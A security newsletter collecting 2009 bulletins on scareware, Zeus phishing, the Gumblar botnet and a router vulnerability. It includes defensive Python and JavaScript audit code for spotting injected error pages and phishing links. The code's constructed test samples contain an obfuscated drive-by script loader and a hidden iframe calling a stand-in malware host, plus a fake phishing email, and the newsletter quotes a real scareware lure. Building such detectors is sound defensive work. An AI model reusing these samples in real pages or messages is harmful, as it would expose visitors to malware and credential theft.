
Information Security Newsletter

Bulletins posted 10/22/2009

Kanye West death prank used to sling scareware

But Beyonce had one of the best hoaxes of all time

Rumours of the death of rapper Kanye West in a car crash became fodder for fake anti-malware scams on Tuesday.

Users searching for more info on the fictitious fatality are liable to get redirected to sites distributing scareware, security researchers warn. The rumour itself reportedly originated on notorious image board 4chan, the seeding ground for the Anonymous campaign against Scientology.

Bogus reports, claiming West met his maker in a crash involving two luxury cars in Los Angeles, subsequently appeared in email as well as appearing on social network sites such as Facebook and Twitter.

These reports didn't themselves point to malware-infested sites but made the topic of West's supposed demise a trending topic on Twitter and elsewhere.

Unsavoury characters latched onto this to poison search results related to the rapper's fictitious James Dean-style death.

The incident is yet another example of hackers gaming search engine rankings for events in the news to expose the unwary to fake anti-malware scams.

Other recent campaigns along the same lines have hopped aboard the news of the death of Michael Jackson and the recent launch of Google Wave, among many others. It seems almost inevitable that the imminent launch of Windows 7 will also be used to throw out scareware.

If you have fallen for this scam, notify your service desk immediately and change your passwords. -By John Leyden

4 Tips for Writing a Great Social Media Security Policy

Security researchers at IANS think social media policies provide security departments with a great opportunity.

  • 1. Don't start from scratch
    The media landscape is so dynamic that if you create policy for today's hot technology, tomorrow it will be obscure. Instead, said Phillips, use this as an opportunity to draw attention to existing policies.

  • 2. Use social media policies to raise security awareness
    For instance, when compliance regulations came into play, savvy security teams were able to create new policies to comply, while also letting employees know why they were important.

  • 3. Use social media access to raise security's positive profile within the organization
    While the initial security reaction to new media is often to block, Phillips said most organizations now need to consider that allowing access may be not only necessary but also useful from an infosec perspective.

  • 4. Be prepared for the next phase
    As social media platforms come and go, some will ultimately become commonplace and integral to an enterprise. While creating entirely new policies around social media doesn't make sense right now, at some point, said Phillips, it will become necessary for policies to be more specific.

    For further information on how to set this up yourself, please see the full article.

    CSO -By Joan Goodchild

    Gaping Security Hole Turns Cable Modems Into Hacker Prey

    A blogger helping to tune a friend's Wi-Fi network uncovered a gaping security hole in Wi-Fi cable modem routers installed in 64,000 Time Warner subscribers' homes, leaving them open to attack.

    Time Warner says that within the past week it has patched the problem until the manufacturer can provide a permanent fix, but before that it had allowed administrative access to the routers. Attackers could then run a variety of programs against these routers, says David Chen in his blog Chenosaurus.

    Because the vulnerability let anyone anywhere on the Internet take over control of the router, they could launch attacks from within Time Warner customers' homes.

    "From within your own network, an intruder can eavesdrop on sensitive data being sent over the Internet and even worse, they can manipulate the DNS address to point trusted sites to malicious servers to perform man-in-the-middle attacks," Chen writes. "Someone skilled enough can possibly even modify and install a new firmware onto the router, which can then automatically scan and infect other routers automatically."

    Chen says he discovered that administrative control of the routers had been blocked by a Java script. He disabled Java on his friend's router and had access to all the router's settings. He opened the backup configuration file and discovered the administrative login and password in plaintext.

    Chen also notes that the router allows only Wired Equivalent Privacy encryption, which he says is readily broken, allowing anyone who can break WEP access to the network. He also says the fixed format for the routers' SSIDs makes it possible to figure out which Wi-Fi networks are run by SMC 8014s.

    To find out more information, please see the full article. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -Tim Greene

    Best Practices for Verifying and Cleaning up a Compromised Site

    It's not always clear to webmasters how to go about cleaning up their sites once they've been compromised, so this time we thought we'd share some best practices.

  • 1) Verify Your Site with Google Webmaster Tools
    If you have added and verified your site's ownership with Google Webmaster Tools, you can view a partial list of URLs where our system has detected suspicious content on your site, as well as samples of the malicious code. Once you've thoroughly cleaned up your site and addressed the vulnerability that allowed it to be compromised, it's easy to request a review through Webmaster Tools.

  • 2) If Your Site Has Been Compromised, Perform a Comprehensive Cleanup
    If any part of your site has been compromised, thoroughly check all pages on the site for harmful code or content, not just the example pages listed in Webmaster Tools. Be sure to identify and address the underlying vulnerability that led to the compromise, or else reinfection is likely to occur.

    Deleted & Error Pages: Dark Corners of Your Website Where Malware May Be Lurking

    When a page is deleted from a site, the web server returns an error code (usually 404: Not Found) when requests to the "deleted" URLs are made. In addition to the error code in the HTTP header, the web server may send a custom error page or "Not Found" page, usually intended to help users find what they are looking for. If your site is infected, its error page can contain arbitrary HTML that exposes your visitors to malware.

  • 3) If You Switch Hosting Providers, Disable Access to the Old Version of Your Site
    When a site is moved to a different hosting provider, the DNS records are updated such that the domain name points to a new IP address. In some cases, DNS caching can cause your domain name to continue resolving to the old IP address for some visitors even after the site has moved.

    For this reason, we recommend instructing your former hosting provider to stop serving any content for your site. This may cause some visitors to experience server errors for a few hours, but it can protect them from visiting a potentially dangerous web server.
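    The "dark corners" point above is easy to miss during a cleanup, so here is an added example (not from the original article or from Google) of a small audit that a webmaster can run over the body returned for a deleted URL: it confirms the status is really an error code and flags hidden iframes, scripts loaded from hosts outside an assumed allowlist, and inline scripts using common obfuscation calls. The sample pages, the `.invalid` hostnames and the `www.example.org` allowlist are constructed for the demonstration.

```python
"""Audit a site's custom error page for injected content (constructed example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic patterns common in injected drive-by loaders: eval/unescape/fromCharCode
# and percent- or hex-escaped '<' used to hide a <script> or <iframe> tag.
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|fromCharCode|%3c|\\x3c", re.IGNORECASE)


class _PageScan(HTMLParser):
    """Collect <script>/<iframe> elements and inline script bodies in document order."""

    def __init__(self):
        super().__init__()
        self.elements = []        # ("script"|"iframe", attrs) or ("inline_js", text)
        self._script_buf = None   # accumulates text while inside a <script>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.elements.append(("script", attrs))
            self._script_buf = []
        elif tag == "iframe":
            self.elements.append(("iframe", attrs))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.elements.append(("inline_js", "".join(self._script_buf)))
            self._script_buf = None


def _is_hidden(attrs):
    """True for the 0/1-pixel or display:none frames typical of drive-by injections."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = {"0", "1", "0px", "1px"}
    return ("display:none" in style or "visibility:hidden" in style
            or attrs.get("width") in tiny or attrs.get("height") in tiny)


def _is_external(src, allowed_hosts):
    """Relative URLs (no host) count as same-site; anything else must be allowlisted."""
    host = urlparse(src).hostname
    return host is not None and host.lower() not in allowed_hosts


def detect_injections(html, allowed_hosts):
    """Return a list of findings ({'kind': ..., 'detail': ...}) for one HTML body."""
    scan = _PageScan()
    scan.feed(html)
    scan.close()
    findings = []
    for kind, payload in scan.elements:
        if kind == "inline_js":
            if OBFUSCATION.search(payload):
                findings.append({"kind": "obfuscated_script",
                                 "detail": payload.strip()[:80]})
            continue
        src = payload.get("src") or ""
        if kind == "iframe" and _is_hidden(payload):
            findings.append({"kind": "hidden_iframe", "detail": src})
        elif src and _is_external(src, allowed_hosts):
            findings.append({"kind": "external_" + kind, "detail": src})
    return findings


def audit_error_page(status, body, allowed_hosts):
    """Audit one response to a deleted URL: status must be an error, body must be clean."""
    return {
        "status_ok": status in (404, 410),
        "findings": detect_injections(body, {h.lower() for h in allowed_hosts}),
    }


# Constructed samples of a clean and an injected custom 404 page.
CLEAN_404 = """<html><head><title>Not Found</title>
<script src="/assets/site.js"></script>
<script src="https://www.example.org/assets/search.js"></script>
</head><body><h1>Page not found</h1><p>Try the <a href="/">home page</a>.</p></body></html>"""

INFECTED_404 = """<html><head><title>Not Found</title>
<script>document.write(unescape('%3Cscript src=%22http://malware.invalid/x.js%22%3E%3C/script%3E'))</script>
</head><body><h1>Page not found</h1>
<iframe src="http://malware.invalid/load.php" width="1" height="1" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, status, body in (("clean", 404, CLEAN_404), ("infected", 200, INFECTED_404)):
        result = audit_error_page(status, body, {"www.example.org"})
        print(name, "status_ok=%s" % result["status_ok"], result["findings"])
```

    In practice the body and status come from fetching a handful of URLs you know you deleted; a page that answers 200 with injected content is a sign the server, not just a page, has been tampered with.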

    For further information on how to do this yourself, please see the full article.

    Security Team -By Panayiotis Mavrommatis

    Bulletins posted 10/21/2009

    Consumers should clean up their act on personal security

    The growing use of social networking sites is leaving PCs inadvertently open to identity thieves, warned Hugh Thompson, chief security strategist at People Security.

    Speaking at the RSA Europe Conference, Thompson said that people were unaware just how many clues they left for fraudsters. He said such carelessness was fuelling the rise of cybercrime.

    He told the conference how he managed to access the bank account of one of his wife's friends in a couple of hours using publicly available data, a process that he had previously documented in a Scientific American article.

    He warned that most people's private accounts could be accessed in this way.

    He identified three ways in which public data could be misused: direct use; what he called "amplification gateway data", where public data is converted to private data by combining it with additional data; and a third described below.

    "For example," said Thompson, "fraudsters using the first four numbers of a credit card number to extract the remaining numbers."

    The third technique was drawing on collective intelligence and correlating publicly available information. As an example, he cited the appearance of 10 senior executives all seeking recommendations on LinkedIn at the same time: "if you see one manager, that tells you that someone's job-hunting; 10 tells you something about the company - perhaps it's in trouble, perhaps there's going to be a takeover."

    Thompson exhorted delegates to carry out their own self-hygiene tests. "Spend an hour on Google searching your own name and see what information is available. Old resumes are a particular wealth of information."

    He said that the 'reset your password' facility was also a security weakness, pointing out that Sarah Palin's webmail account was subverted last year by resetting the password through the use of publicly available information.

    He pointed out that users should take on greater responsibility to help reduce cybercrime. He said that consumers should look beyond traditional security measures and be aware of the amount of information that they were leaving scattered in cyberspace.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    TechWorld -By Maxwell Cooter

    Two out of five at risk from Wi-Fi hijacking

    Two out of five web users are at risk of having their Wi-Fi connection hijacked, says TalkTalk.

    Research by the ISP revealed that five percent of internet connections have no security whatsoever, while 36 percent use WEP, which TalkTalk says is easily hackable.

    Only three percent of broadband connections in the UK use the most secure form of protection, WPA2.

    The ISP is concerned that under new proposals to tackle internet piracy, which are currently being heavily backed by Business Secretary Lord Mandelson, many Brits could find themselves accused of illegal file-sharing and banned from the web, even if a cybercriminal hijacked their Wi-Fi connection to illegally share files.

    With this in mind TalkTalk has launched a campaign that aims to ensure Brits aren't disconnected without a trial.

    Don't Disconnect Us sets out three major objections to Lord Mandelson's plans: that it bypasses the courts and gives rightsholders quasi-judicial powers, and that it exposes millions of people to false prosecution since it is based on 'guilty until proven innocent'.

    Finally, TalkTalk says it will do little to tackle illegal filesharing since the main offenders will use Wi-Fi hijacking in a bid to avoid detection.

    The Don't Disconnect Us website will also allow web users to discover the latest views on tackling illegal filesharing from around the world, a link to a petition on the No 10 website where opposition to the plans can be registered, and a forum to discuss the issue.

    "There is a lot of opposition to Lord Mandelson's plans on filesharing but there is no single online forum which draws all that opposition together. That is the purpose of Don't Disconnect Us. But we also want to hear from people who think we're wrong so we can have a full and frank exchange of views," a TalkTalk spokesman said.

    For more details on how to protect yourself, please see the full article.

    PC Advisor UK -By Carrie-ann Skinner

    Time Warner Cable Exposes 65,000 Customer Routers to Remote Hacks

    A vulnerability in a Time Warner cable modem and Wi-Fi router deployed to 65,000 customers would allow a hacker to remotely access the device's administrative menu over the internet, and potentially change the settings to intercept traffic, according to a blogger who discovered the issue.

    Time Warner acknowledged the problem to Threat Level on Tuesday, and says it's in the process of testing replacement firmware code from the router manufacturer, which it plans to push out to customers soon.

    The vulnerability lies with Time Warner's SMC8014 series cable modem/Wi-Fi router combo, made by SMC. The device is one of several options Time Warner offers to customers who don't want to install their own modem and router to use with the company's broadband service.

    The device is installed with default configurations, which customers can alter only slightly through its built-in web server. The most customers can do through this page is add a list of URLs they want their router to block.

    The attacker would need the router's IP address to conduct the attack. But Chen found a dozen customer SMC8014 series cable modem/Wi-Fi routers by simply running a port scan on a subnet of 255 Time Warner IP addresses.

    An evil hacker could easily automate a scanning tool to sweep through Time Warner's address space and hack every SMC8014 it finds.

    "From within your own network, an intruder can eavesdrop on sensitive data being sent over the internet and even worse, they can manipulate the DNS address to point trusted sites to malicious servers to perform man-in-the-middle attacks," Chen wrote on his blog. "Someone skilled enough can possibly even modify and install a new firmware onto the router, which can then automatically scan and infect other routers automatically."

    For more details on how to protect yourself, please see the full article. If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Kim Zetter

    Bulletins posted 10/20/2009

    Botnet Unleashes Variety Of New Phishing Attacks

    Attackers use phony messages of system upgrades, Outlook updates, and Microsoft Conficker 'cleanup tool' to spread malware

    The massive Zbot botnet that spreads the treacherous Zeus banking Trojan has been launching a wave of relatively convincing phishing attacks during the past few days -- the most recent of which is a phony warning of a mass Conficker infection from Microsoft that comes with a free "cleanup tool."

    The wave of attacks began early last week targeting corporations in the form of email messages that alerted victims of a "system upgrade."

    The email is accompanied by poisoned attachments and links; in some cases it poses as a message from victims' IT departments, including their actual email domains, and alerts them about a "security upgrade" to their email accounts.

    The message then refers victims to a link to reset their mailbox accounts, and the link takes them to a site that looks a lot like an Outlook Web Access (OWA) page (PDF), but instead infects them with the Zeus Trojan.

    The Zbot botnet, which is made up of 3.6 million PCs in the U.S., or 1 percent of all PCs in the country, according to data from Damballa, spreads the deadly Zeus Trojan.

    Zeus, which steals users' online financial credentials, represents 44 percent of all financial malware infections today, according to Trusteer.

    The Outlook attack was the first large-scale Zeus attack against the corporate world, he says, which signals a new strategy for Zbot.

    "Shifting its focus there makes a lot of sense for financial malware because the typical credentials you can steal from the corporate world are worth a lot more money than credit cards and accounts in the consumer world. To own the company's accountant or finance department's bank account credentials would be a lot more profitable," Klein says.

    Zeus traditionally has been one of the more difficult malware variants for some antivirus programs to detect: According to recent data from Trusteer, Zeus is detected only 23 percent of the time by up-to-date antivirus applications.

    It's also hard to kill because it hides itself so well in the operating system.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    DarkReading -By Kelly Jackson Higgins

    Fake 'Conficker.B Infection Alert' spam campaign drops scareware

    An ongoing spam campaign is once again attempting to impersonate Microsoft's security team.

    The use of email as a propagation vector for scareware campaigns (see The ultimate guide to scareware protection), and in particular the use of email attachments, is an uncommon practice compared to the single most effective way of hijacking traffic: blackhat search engine optimization, where the cybercriminals rely on real-time news events.

    The campaign is, thankfully, a badly executed one: with Microsoft's Security Essentials having recently gained momentum, even the average Internet user would notice the suspicious timing of the offered antispyware program.

    • Example of email:

    Dear Microsoft Customer,

    Starting 18/10/2009 the Conficker worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected. To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

    Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.
    Microsoft Windows Agent #2 (Hollis)

    Microsoft Windows Computer Safety Division

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Dancho Danchev

    Gumblar Trojan drive-by exploits spike following Adobe update

    The Gumblar Trojan, responsible for stealing thousands of website FTP credentials earlier this year, has returned, according to researchers, this time seeking out users who failed to deploy patches released last week by Adobe Systems Inc.

    The malware exploit is spreading via legitimate websites, according to IBM's X-Force security team.

    It finds a way in by targeting website vulnerabilities, injecting code into pages that is designed to trip up visitors in drive-by attacks.

    The result is an increase in malicious PDF files.

    IBM said Gumblar activity increased shortly after Adobe released an update patching 34 vulnerabilities, some critical, in both its popular Adobe Reader and Acrobat PDF-viewing software.

    A considerable increase in malicious PDF files was detected by IBM honeypots on Monday, passing a PDF exploit targeting Adobe Flash and also checking for unpatched vulnerabilities in Microsoft Office Web Components.

    "All of these attacks are very recent and effective at compromising the client-side victim in an effort to propagate their malicious payload worldwide," the researchers wrote in a posting on the IBM X-Force Frequency X blog.

    The researchers noted that Gumblar is likely continuing to use stolen FTP password credentials to compromise websites and set up its drive-by attack campaign.

    Security researchers noted in June that Gumblar harvested as many as 80,000 FTP passwords at the time. Victims infected with malware through the attacks are often hit with password-stealing malware.

    Gumblar is also known as Gumblar Martuz, because the cybercriminals behind the attacks switched from China-based malicious domains to Martuz, domains based in the U.K.

    The cybercriminals behind the malware exploit have slightly changed their method of infection. Once a hole is discovered in a website, malicious scripts and payloads are hosted directly on the compromised host.

    The previous Gumblar variant used a remote server to host the payload and malicious scripts, the IBM researchers said.

    The U.S. Computer Emergency Response Team (US-CERT) issued an advisory in May warning about the dangers posed by Gumblar.

    In it, US-CERT warned enterprises and consumers to install the latest updates for various Web applications, including Flash Player and Adobe Reader.

    The good news is that IBM endpoint and network intrusion prevention systems, as well as Symantec Corp. and other antivirus vendors, are blocking malware that attempts to exploit the known Web application vulnerabilities.

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Robert Westervelt

    Two ways to download software updates in Snow Leopard

    When running Software Update in OS X 10.5 and earlier, you could choose to download available Software Updates, instead of installing them.

    To do so, you could just select Update -> Download Only after the list of available updates appeared. In 10.6, this menu item is gone, as is Install and Keep Package, which appeared in the same menu.

    The obvious choice is a new entry in the Update menu in Software Update: Go to Apple Downloads Page.

    On the Apple Downloads page, you'll find, in theory, every software update that Apple releases, each of which can be downloaded and saved on your Mac.

    Downloading a number of updates one by one can be a bit of a chore, though.

    The other alternative is to use the softwareupdate program in Terminal, which still has a download option available in 10.6. In Terminal, type softwareupdate -d (then press Return) to launch the softwareupdate tool in download mode.

    Unlike using your browser, this command will download all available updates at once, and will do so without requiring your admin password.

    Let the program run, and when it's done (the Terminal's command prompt will return), you'll find the downloaded updates in the top-level Library -> Updates folder. From there, you can install them, or copy them to other Macs for future installation.

    For more detailed instructions, please see the full article. -By Rob Griffiths

    Save Printer Ink by Choosing an Ink-Saving Font

    This is not security related, but we thought it was a good tip and worth posting because it can save you some money.

    Is there such a thing as a "green" font? There is, and it's called, aptly enough, Ecofont. It's free, and it's fabulous.

    You can configure your printer driver to print two pages on one piece of paper. You can turn on "draft" mode for lighter output and less ink consumption. And, my favorite: bypass printing altogether and generate PDFs.

    Now there's another option, one that combats excessive ink consumption at the font level: Ecofont, a free typeface that promises to reduce ink use by up to 20 percent.

    Ecofont looks a lot like regular old Arial, but with one key difference: holes. Each letter has lots of little holes punched out of it, meaning it requires less ink to print.

    Thankfully, Ecofont is still very readable. So you can use it for your everyday print jobs, switching to a regular font only when absolutely necessary.

    Obviously there are lots of outline-style fonts that would accomplish more or less the same thing. But most of them are fancy, showy typefaces; not many look like everyday Arial.

    To get a link to Ecofont or for more detailed information on how this can save you money, please see the full article.

    PC World -By Rick Broida

    Bulletins posted 10/19/2009

    How hackers find your weak spots

    A look at some of the ways hackers use social networking tools to gain access to victims' systems

    While there are an infinite number of social engineering exploits, typical ones include the following:

    • Stealing passwords:

    In this common maneuver, the hacker uses information from a social networking profile to guess a victim's password reminder question.

    • Friending:

    In this scenario, a hacker gains the trust of an individual or group and then gets them to click on links or attachments that contain malware that introduces a threat, such as the ability to exploit a weakness in a corporate system.

    For example, says Netragard CTO Adriel Desautels, he might strike up an online conversation about fishing and then send a photo of a boat he's thinking of buying.

    • Impersonation/social network squatting:

    In this case, the hacker tweets you, friends you or otherwise contacts you online using the name of someone you know.

    Then he asks you to do him a favor, like sending him a spreadsheet or giving him data from "the office."

    • Posing as an insider:

    Imagine all the information you could extract from an unknowing employee if you posed as an IT help desk worker or contractor.

    On the Netragard blog, he describes an exploit in which a Netragard worker posed as a contractor, befriended a group of the client's workers and set up a successful phishing scheme through which he gleaned employee credentials, eventually gaining entry to the entire corporate infrastructure.

    For further information on how to protect yourself, please see the full article. -By Mary Brandel

    Spam Strangles YouTube

    A prediction two years ago by IT security solutions firm Kaspersky Lab on the possible use of YouTube as a medium for disseminating spam has finally been fulfilled.

    Kaspersky Lab's Content Filtering Research group recorded a mass mailing that contained a link directing users to a video advert on YouTube.

    There were several message variations in the mass mailing, but they all included the same link to YouTube.

    Due to its worldwide popularity, YouTube is a potentially attractive resource for distributing spam, Kaspersky Lab said.

    Last April, messages were detected that contained nonstandard, complex images advertising spammer services.

    Noise techniques have also been applied to graphical files, causing problems for spam filters.

    Kaspersky Lab reminded users how important it is to keep spam filters turned on in order to block unwanted or potentially hazardous correspondence.

    The spam filter training option in the company's products should also be utilized to constantly improve protection against all types of unsolicited mass mailings.

    Be careful when downloading from YouTube, and if you have fallen for this scam, notify your service desk immediately and change your passwords.

    Computerworld Philippines -By Tom S. Noda

    Aggressive tactics used in new distribution and installation of fake anti-virus software

    PandaLabs has identified a new and aggressive trend for selling fake anti-virus software.

    It claimed that in comparison to previous campaigns, where users would typically see a series of warnings prompting them to buy a version of the program, the new technologies are being combined with ransomware, hijacking the computer and rendering it useless until victims complete the purchase.

    The fake program, called Total Security 2009, is offered for 74.50. Victims are also offered 'premium' tech support services for an additional 18.60.

    Users who pay the ransom will receive a serial number, which, when entered in the application, will release all files and executables, allowing them to work normally and recover their information. The fake anti-virus, however, will remain on the system.

    Luis Corrons, technical director of PandaLabs, said: "The way this rogueware operates presents a dual risk: firstly, users are tricked into paying money simply in order to use their computers; and secondly, these same users may believe that they have a genuine anti-virus installed on the computer, thereby leaving the system unprotected."

    Users are often infected unknowingly, in most cases, through visiting hacked websites, and once a computer is infected it is extremely difficult to eliminate the threat, even for those with a certain degree of technical knowledge.

    Users are also prevented from using any type of detection or disinfection tool, as all programs are blocked.

    Corrons claimed that once a computer is infected, any attempt made by the user to run a program or open a document will be unsuccessful, and the only response from the computer will be to display a message falsely informing the victim that all files are infected with the only solution being to buy the fake anti-virus.

    He also said that the only application that can be used is the internet browser, conveniently allowing the victim to pay for the fake anti-virus.

    PandaLabs has published on its blog the serial numbers required to unblock the computer if it has been hijacked. "Users can then install genuine security software to scan the computer in-depth and eliminate all traces of this fake anti-virus," Corrons said. -By Dan Raywood

    Symantec calls 'SpywareGuard' and 'AntiVirus' top scareware threats

    Fake security software "SpywareGuard" and "AntiVirus" are said to be the top two scareware programs out of about 250 fake security programs detected, according to a Symantec report.

    Symantec examined evidence of what it could detect online for a six-month period, how it was propagating, and what fake security software programs were costing, says Mark Fossi, editor of the report. "Sometimes it's sold as a complete security suite," he said, adding, "it mostly does nothing."

    Rogue security software is often called scareware because these fake antivirus and registry cleaners can convince the victim to purchase based on flagging screens warning them about threats that don't exist outside the scareware itself.

    According to the Symantec report: "There are two prevalent ways in which rogue security software can be installed on a user's computer; either it is downloaded and installed manually by a user after he or she has been tricked into delivering the software as legitimate, or it is knowingly installed onto a user's computer, such as when a user visits a malicious Web site designed to automatically download and install illegitimate applications."

    Some scams even return e-mail messages to the victim with a receipt for purchase that includes a serial number and a valid functioning customer-service phone number.

    Customers often pay for scareware with credit cards, and the report notes, "Since the payment services used are often legitimate, there is a constant threat that the payment services provider will discover that its service is used for fraud."

    But "scammers also benefit from phishing personal information for users who register rogue applications." This could include the credit card number and payment details that can be sold into the underground economy for further abuse.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -By Ellen Messmer

    Fake Antivirus Attacks, Demands Ransom

    The fake antivirus phenomenon has taken an unpleasant turn with the discovery of a Windows program that not only cons users into buying an unnecessary license but appears to lock files and applications on the victim's PC.

    According to security company Panda Security, rogueware program Total Security 2009 starts out in conventional fashion with the 'discovery' of a non-existent malware infection for which it demands an unusually ambitious $79.95 (50), and even has the cheek to ask a further $19.95 for 'premium' technical support.

    Users deciding against purchasing the license find that all files and applications on their PC have been designated as 'infected' and made inaccessible until the user follows on-screen instructions to buy a license using the only working application, Internet Explorer.

    According to Panda Security, the technique used to block access involves simple interception of Windows calls to open files and applications, closing them before they can open. Sophisticated techniques such as file encryption are not needed.

    The bogus program would get on to a user's PC in the first place after they had either clicked on a link in a spam email, visited an infected distribution website, or even visited the program's convincing-looking product homepage. Once registered, Total Security 2009 remains on the system.

    "Specifically, criminals will generate a new undetected sample on the fly and then distribute it to users. Knowing that the AV companies will detect it shortly, the criminals force users into purchasing the rogueware before the signature detection can kick in to remove it," said Luis Corrons, technical director of PandaLabs.

    In the last year, fake antivirus programs have become possibly the biggest money-making scam on the Internet after spam marketing, even managing to find distribution on false pretences through premium Internet sites such as The New York Times.

    There is growing evidence that many genuine antivirus programs don't detect some of these scam programs, which might also be a reason behind their success.

    For more information please see full article. If you have fallen for this scam, notify your service desk immediately and change your passwords. -John E. Dunn

    Bulletins posted 10/16/2009

    Phishing attacks with Zeus Trojan targeting Outlook Webmail shops

    Phishing E-mails attempt to fool Microsoft Outlook Web Access users at enterprises.

    Targeted phishing attacks aimed at getting Outlook Web Access users within enterprise organizations to download a Trojan designed to steal financial and account information are spreading fast.

    "It started yesterday, with more than 50 customers of ours receiving this e-mail and we've been targeted ourselves," says Mickey Boodaei, CEO of security firm Trusteer.

    The e-mail-based attack is customized to fool employees in each enterprise it's sent to, with the "from" address appearing to come from within the enterprise, asking the recipient on behalf of the systems administrator to modify their e-mail settings for Outlook Webmail as a result of an upgrade.

    Though the link appears to be to the enterprise Outlook Web Access site, it's actually a Web site in Chile, Colombia, Romania or Russia that's craftily trying to get the victim to download a file that's the dangerous Zeus/Zbot Trojan, says Boodaei.

    The Zeus Trojan is well known; it's part of the fake IRS Web site e-mail scam sweeping into mailboxes at present.

    Using an isolated computer, Trusteer downloaded the Zeus Trojan to see how it would work in the case of these phishing messages and found the attack involves keeping track of what everyone who receives it might do.

    "It even sends a follow-up e-mail that says "you didn't complete the process,'" Boodaei notes.

    Trusteer points out that warding off this type of attack against employees entails educating them about phishing and blocking download of executable and zip files from the Web.
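The two tells Trusteer describes, a link whose visible text names the company's own Outlook Web Access host while the href points at a server elsewhere, and a link that fetches an executable or archive, can be checked mechanically before a message reaches users. The following is an added example, not Trusteer's code and not part of the original article; the enterprise domain example.com, the hostnames and the mail body are constructed for the illustration.

```javascript
// Added example: audit the links in an HTML e-mail for the tells used by the
// Zeus/Zbot OWA phishing run described above. Not Trusteer's code; the mail
// body, hostnames and the enterprise domain below are constructed.

const ORG_DOMAIN = "example.com"; // assumed: the enterprise's own domain

// Constructed phishing mail: the visible text shows the real OWA host,
// the href points at an outside server, and a second link fetches a zip.
const SAMPLE_MAIL_HTML = `
<p>Dear user, a mail server upgrade requires you to update your settings.</p>
<p>Open <a href="http://owa-update.example-setup.ru/settings.php">https://webmail.example.com/owa/</a>
and run <a href="http://owa-update.example-setup.ru/owa_settings.zip">the settings tool</a>.</p>
<p>Questions: <a href="https://intranet.example.com/helpdesk">intranet.example.com/helpdesk</a></p>
`;

// File types that should not arrive as a click-through from mail.
const RISKY_EXTENSIONS = /\.(exe|scr|pif|bat|cmd|msi|zip|rar|cab)$/i;

// If the anchor's visible text looks like a URL or hostname, return that
// hostname (lowercase); otherwise null. Plain words never match.
function hostNamedBy(text) {
  const m = /^(?:[a-z][a-z0-9+.-]*:\/\/)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:[/:?#]|$)/i.exec(text.trim());
  return m ? m[1].toLowerCase() : null;
}

function inDomain(host, domain) {
  return host === domain || host.endsWith("." + domain);
}

// Returns one finding per suspicious anchor: { href, text, reasons[] }.
function auditLinks(html, orgDomain) {
  const findings = [];
  const anchorRe = /<a\s+[^>]*?href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = anchorRe.exec(html)) !== null) {
    const href = m[1];
    const text = m[2].replace(/<[^>]+>/g, "").trim(); // strip inline tags
    let target;
    try {
      target = new URL(href);
    } catch (e) {
      findings.push({ href, text, reasons: ["href is not a parseable URL"] });
      continue;
    }
    const host = target.hostname.toLowerCase();
    const reasons = [];
    const shown = hostNamedBy(text);
    if (shown && shown !== host) {
      reasons.push(`visible text names ${shown} but the link goes to ${host}`);
    }
    if (!inDomain(host, orgDomain)) {
      reasons.push(`destination ${host} is outside ${orgDomain}`);
    }
    if (RISKY_EXTENSIONS.test(target.pathname)) {
      reasons.push("link fetches an executable or archive");
    }
    if (reasons.length > 0) findings.push({ href, text, reasons });
  }
  return findings;
}

// Stand-alone run: print the findings for the constructed mail.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditLinks(SAMPLE_MAIL_HTML, ORG_DOMAIN), null, 2));
}
```

Run with node; the constructed mail yields two findings, the disguised OWA link (host mismatch plus off-domain destination) and the zip download, while the genuine intranet link passes. The check is deliberately conservative: a word like "here" is never treated as a hostname, so only text that actually looks like an address can trigger the mismatch rule.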

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -By Ellen Messmer

    Gumblar botnet awakens after five months to distribute malware

    The Gumblar botnet has begun to be seen again five months after it rose to prominence.

    Mary Landesman, senior security researcher at ScanSafe, claimed that after it built a botnet of compromised websites in May, it is now using those compromised websites as hosts for its malware.

    Landesman said: "In a typical outbreak situation, there are compromised websites that act as a conduit for malware hosted on an attacker-owned site.

    "But in this case, the malware resides on thousands of legitimate (but compromised) websites.

    "The majority of the compromised websites are small mom-and-pop style websites in non-English speaking countries, but that's not important because the attackers have a clever trick for driving traffic directly to the malware hosted on those sites.

    "An iframe pointing to the malicious script on the compromised site is forcibly injected on various forums.

    "The injected forums we've seen thus far are using feed aggregators to push their forum posts out to subscribers, who are then exposed to the iframe."

    Landesman further claimed that the malicious script (which contains certain unique components included in the first stage Gumblar attacks), checks for the version of Adobe Reader and Adobe Flash and delivers the same URL with a unique SID depending on those results.

    The script also contains an exploit for the Microsoft Office Web Components vulnerability described in MS09-043, which was patched in August 2009. Successful exploit results in a randomly named file dropped to the system.

    This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware also takes a read of sqlsodbc.chm, a file targeted by previous Gumblar-delivered malware, said Landesman.

    ScanSafe claimed that signature detection of the malware is very low according to a VirusTotal report.

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Dan Raywood

    Hacked Facebook Apps Lead to Fake Antivirus Software

    New applications are turning up on Facebook. Unfortunately, some of them are fake antivirus programs.

    While researching Web sites that host malicious software, Roger Thompson, chief research officer of software security company AVG, noticed something funny.

    A Russian Web site known for hosting malware was getting lots of referrals from Facebook.

